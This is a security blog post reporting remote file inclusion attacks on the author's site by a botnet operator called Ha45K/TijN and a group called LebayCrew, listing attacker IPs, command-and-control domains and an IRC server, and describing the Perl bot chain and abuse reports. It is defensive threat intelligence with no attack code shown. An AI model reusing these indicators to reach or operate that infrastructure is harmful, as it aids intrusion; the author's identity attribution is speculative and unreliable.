Ha45K / TijN botnets : RFI Attacks

I notice an icrease of the “generics attacks” on my website for the last days : https://www.malekal.com/modsec/ (blue line on the first graph).

A check show that some RFI attacks icreases.

few days ago :
https://www.malekal.com/modsec/index.php?ip=1.224.163.80
https://www.malekal.com/modsec/index.php?ip=71.6.150.241

Last attacks :
https://www.malekal.com/modsec/index.php?ip=46.252.18.54
https://www.malekal.com/modsec/index.php?ip=95.168.199.227

All the attacks against my websites (42 distinct IPs – so not so much) :
27.156.77.42
27.151.108.111
110.87.155.52
70.32.104.222
108.59.11.193
178.33.122.140
117.25.73.41
117.25.73.207
69.167.158.139
95.110.243.173
181.65.186.35
77.68.37.155
203.124.10.81
107.6.20.170
176.31.252.38
50.21.183.38
66.158.191.204
91.209.108.152
222.77.192.91
69.36.182.205
50.28.14.54
80.68.145.110
94.246.128.46
91.121.6.123
211.47.181.38
71.6.150.241
112.218.68.155
1.224.163.80
212.34.151.164
180.179.212.185
154.41.66.23
95.168.199.227
46.252.18.54
198.50.146.246
178.33.226.103
118.129.167.63
203.58.0.155
118.129.167.21

The RFI attacks was trying to make download a Perl script that connect to scary.angels-agency.nl

Ha45K_scarys_angels-agencythen it makes connect to 58.150.55.36 (also using the DNS ha45k.hopto.org)

Ha45K_rfi_attacks3

i sent an abuse for this.

Ha45K_scarys_angels-agency_abuse

in result  :

no-ip has moved : ha45k.hopto.org has address 0.0.0.0

and scary.angels-agency.nl is also suspended.
58.150.55.36 is still up.

Actually, the RFI attacks send a script to get informations from the victim server (and see if the RFI attack is successfull) :

Ha45K_rfi_sh

the bt.php is still around, and now connecting to 58.150.55.36 already mentionned in the abuse email  i sent.

Ha45K_rfi_bt

Some Shell Around :

Ha45K_rfi_attacks2

and the RFI Attacks sent by the botmaster :

Ha45K_rfi_attacks

 

The guy Ha45K seems to be active in HF forum and unknown.eu forum
He is also using the nickname TijN (use in the identd) : download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
And doing this for a while now – April 2013 : https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d

Ha45K_TijN

 

EDIT – February 24

Seems Ha45K has read this entry and trying spam something :

Ha45K_spam

and some Spam Attacks :

Ha45K_spam3
We can see the Generics Attack peak : https://www.malekal.com/modsec/index.php
Ha45K_spam2

they move to 188.165.17.104 (OVH) and 62.109.4.70 (THEFIRST-NET – RU).
OVH has made the job and 188.165.17.104 is clean now.

btw another active RFI group : LebayCrew
https://www.malekal.com/modsec/index.php?ip=212.227.119.175
https://www.malekal.com/modsec/index.php?ip=203.58.0.155

IRCd : 212.19.3.130 (REDCOM-SRV-WEBHOST – RU)

lebay_crew_RFI

Some scans :

lebay_crew_RFI_scan

 

Sécuriser son site WEB

Vous pouvez aussi jeter un oeil à la page : [réseau] Sécuriser un serveur Apache/PHP/MySQL (LAMP) et l’index menant à différentes ressources pour sécuriser son site WEB

Print Friendly
(Visité 73 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet